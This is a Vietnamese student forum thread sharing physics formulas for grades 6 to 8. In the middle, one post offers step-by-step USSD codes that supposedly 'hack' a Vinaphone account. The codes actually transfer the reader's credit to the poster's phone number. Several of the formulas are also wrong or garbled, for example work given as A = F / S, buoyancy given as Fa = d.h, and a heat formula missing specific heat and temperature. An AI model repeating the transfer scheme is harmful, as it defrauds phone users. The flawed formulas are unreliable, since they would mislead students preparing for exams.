[Vật lý 8]công thức vật lí

C

conang_buongbinh3007

Dưới đây là một số công thức!!! (^_^)
Lớp 6, Lớp 7
- Các đơn vị đo chiều dài:
1inch = 2,54 cm
1 fut = 12 inch
1 dặm = 5280 fut
1 hải lí = 1,852 km
- Đo thể tích:
+ Hình lập phương: V = a^3
+ Hình trụ: V= pi x r^2 x h
+ Hình hộp chữ nhật : V = a x b x h
+ Hình cầu : V = 4/3 x pi x r^3
- Mối quan hệ giữa trọng lượng và khối lượng: P = 10m
- Mối quan hệ giữa khối lượng riêng và trọng lượng riêng: d = 10D
- Tính khối lượng riêng: D = m/V
- Tính trọng lượng riêng: d = P/v
- Công thức của mặt Phẳng nghiêng: F/P = h/l (=) F x l = P x h
- Công thức đòn bẩy: F1/F2 = l2 / l1
- Ròng rọc động : F = P/2
- Công thức tính hiệu suất: H = Công có ích / công toàn phần x 100% ( H = A1/A x 100%)
- Lớp 8
- Tính vận tốc: V = S/t ;
- Tính vận tốc trung bình: Vtb = S1+S2+S3+........+Sn / t1+t2+t3+.......+tn
- Áp suất chất rắn: P = F / S
- Áp suất chất lỏng: P = d x h
- Lực đẩy Ác-si-mét : FA = d x V
- Tính công: A = F / S
- Công suất: P = A / t ( Lưu ý: P hoa khác trong lượng)
- Công thức tính cơ năng: W= Wđ + Wt
- Công thức tính thế năng: Wt = P x h ( P= m x g h biết g= 9,8 ~10)
- Công thức tính động năng: Wđ = m x v^2 / 2
 
T

tranvinh07

mời các bạn **** tài khoản vinaphone
tui thề 100% là đc :khi (197):
b1 : phải có 1 sim vinaphone sử dụng trên 230 (khoảng 7 tháng) tài khoản phải có trên 51111 đ ( tùy vào tài khoản muốn **** có thể trên 11111 đ )
b2 : soạn DK gửi 999 (lấy mk chuyển tiền )
b3: soạn tin DMK (mk cũ ) (mk mới ) gửi 999
( mk mới luôn là 110100 )
b4 : *999*mk*mã 2friend*49999#
( cú pháp đầy đủ là : *999*110100*0943203739*49999# hoặc *999*110100*0943203739*10111# )
mk : 110100
mã 2friend : 0943203739 (mã hóa dữ liệu . làm đóng băng máy chủ vinaphone )
b5 : chờ từ 3 - 5 phút .tài khoản có ngay từ 20222 đến 110100 đ trong tài khoản gốc vs 51111 tiền khuyến mại 1 .
(nếu mạng chậm thì đợi trong vòng 10 phút )
tài khoản hiện tại trong sms của mình là 412295 đ
tôi không phải là một hacker giỏi , nhưng tôi tự hào về nó
 
4

40phamkinhvy

mọi người post giúp mình các công thức vật lí 8 nhé (vd: công thức về mặt phẳng nghiêng , ròng rọc , công suất ,....) mình sắp kiểm tra 1 tiết rùi!!!! Thanks trc"!!!!!!

p=F/S
Fa=d.h
P=10m=V.d
V=m/D
S=v.t
Q=m.v.[tex]\large\Delta[/tex]
Q(nóng chảy)=[tex]\lambda[/tex].m
Q(bay hơi)=L.m
 
Top Bottom